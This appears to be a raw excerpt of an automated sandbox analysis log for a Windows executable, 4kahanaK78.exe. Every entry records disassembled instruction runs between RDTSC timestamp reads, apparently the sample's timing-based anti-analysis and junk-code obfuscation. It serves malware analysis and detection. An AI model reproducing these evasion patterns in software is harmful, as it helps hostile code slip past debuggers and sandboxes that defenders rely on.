Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0DFD3 second address: A0DFF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507508h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E318 second address: A0E323 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E323 second address: A0E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E329 second address: A0E334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E05506CE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E5D1 second address: A0E5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0E055074F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E5E0 second address: A0E5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0E05506CE6h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jl 00007F0E05506CE6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E720 second address: A0E726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E726 second address: A0E72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E72B second address: A0E743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FDh 0x00000007 pushad 0x00000008 jno 00007F0E055074F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E895 second address: A0E8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jp 00007F0E05506CE6h 0x0000000e jmp 00007F0E05506CF5h 0x00000013 popad 0x00000014 push edi 0x00000015 jmp 00007F0E05506CF6h 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F0E05506CF2h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E8E6 second address: A0E908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05507508h 0x00000009 jnc 00007F0E055074F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A0E908 second address: A0E936 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E05506CE6h 0x00000008 jmp 00007F0E05506CF5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E05506CEDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A11C5E second address: A11C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A11C62 second address: A11C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A11C6A second address: A11C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507502h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A13FA2 second address: A13FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0E05506CF6h 0x0000000e pushad 0x0000000f jbe 00007F0E05506CECh 0x00000015 jng 00007F0E05506CE6h 0x0000001b je 00007F0E05506CEEh 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 980087 second address: 9800A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05507507h 0x00000009 jg 00007F0E055074F6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9800A9 second address: 9800AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9800AE second address: 9800B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9800B4 second address: 9800BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A1980F second address: A19829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jmp 00007F0E05507502h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A1DEAE second address: A1DEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A1E2B8 second address: A1E2DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F0E05507507h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A1E2DA second address: A1E2F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CF8h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A1E2F7 second address: A1E305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CA1F2 second address: 9CA1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CA1F6 second address: 9CA1FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CA1FC second address: 9CA231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0E05506CE6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f movzx ecx, si 0x00000012 push 00000004h 0x00000014 or edx, 7183FC00h 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007F0E05506CF8h 0x00000023 jmp 00007F0E05506CF2h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9CA231 second address: 9CA23B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E055074FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A23453 second address: A2346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2346F second address: A234A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E05507508h 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e ja 00007F0E055074FCh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F0E055074FCh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A234A7 second address: A234BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CEFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A234BA second address: A234BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2376D second address: A23771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A23B7E second address: A23B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2C300 second address: A2C305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2A4B0 second address: A2A4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E055074FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2A4C0 second address: A2A4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2A4C8 second address: A2A4CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2A4CD second address: A2A4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2A60C second address: A2A610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2A79C second address: A2A7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jg 00007F0E05506CE8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jc 00007F0E05506CEEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2AD3A second address: A2ADA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E05507508h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007F0E05507504h 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop esi 0x00000016 jng 00007F0E05507502h 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007F0E055074F6h 0x00000024 jmp 00007F0E05507509h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A2B2E8 second address: A2B2F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0E05506CE6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A30CA6 second address: A30CAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A33E89 second address: A33E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05506CEAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3456D second address: A34579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F0E055074F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3D515 second address: A3D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3D51E second address: A3D522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3BE9A second address: A3BEAF instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E05506CF7h 0x00000008 jmp 00007F0E05506CEBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3BEAF second address: A3BED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E05507505h 0x0000000a jmp 00007F0E055074FFh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnl 00007F0E055074F8h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3C013 second address: A3C01F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E05506CE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3C313 second address: A3C319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3C319 second address: A3C31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3C31F second address: A3C325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3CC82 second address: A3CC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05506CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3CC92 second address: A3CC9C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E055074F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A3B29A second address: A3B2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A40871 second address: A408AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E055074F6h 0x00000008 jnc 00007F0E055074F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F0E05507508h 0x00000016 jmp 00007F0E05507502h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A45488 second address: A454A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E05506CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A454A0 second address: A454B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E05507500h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A44E8B second address: A44E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A44E91 second address: A44E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A44E95 second address: A44EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0E05506CE8h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A44EAA second address: A44EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F0E055074F6h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A50CC3 second address: A50CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A52B71 second address: A52B9B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0E055074F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F0E0550750Eh 0x00000012 jmp 00007F0E05507508h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5289D second address: A528BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0E05506CF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A528BA second address: A528D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05507503h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A528D6 second address: A528DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A540BC second address: A540C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A56BDC second address: A56BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A56711 second address: A56726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E055074FBh 0x00000007 jp 00007F0E055074F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A56726 second address: A5672B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5672B second address: A56747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E05507502h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5E74E second address: A5E758 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A5E758 second address: A5E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E24F5 second address: 9E24F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9E24F9 second address: 9E24FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A66C45 second address: A66C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A66AAC second address: A66AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A66AB0 second address: A66AB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A1FC second address: A6A200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A200 second address: A6A20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E05506CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A20C second address: A6A21C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E055074F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A6A21C second address: A6A220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A72493 second address: A7249E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A7249E second address: A724F7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E05506CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F0E05506CF7h 0x00000012 jng 00007F0E05506CE6h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jns 00007F0E05506CE6h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0E05506CF3h 0x0000002f jmp 00007F0E05506CEAh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A72F0F second address: A72F2C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnl 00007F0E055074F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F0E055074FEh 0x00000012 jnl 00007F0E055074F6h 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A72F2C second address: A72F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 pushad 0x00000008 jp 00007F0E05506CE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76D74 second address: A76D8C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E05507502h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76D8C second address: A76D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76D90 second address: A76D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A76817 second address: A7685E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E05506D01h 0x00000008 jmp 00007F0E05506CF9h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jo 00007F0E05506CF9h 0x00000018 jmp 00007F0E05506CF3h 0x0000001d push eax 0x0000001e push edx 0x0000001f js 00007F0E05506CE6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: A88353 second address: A88364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jl 00007F0E055074F6h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\4kahanaK78.exeRDTSC instruction interceptor: First address: 9926FB second address: 9926FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
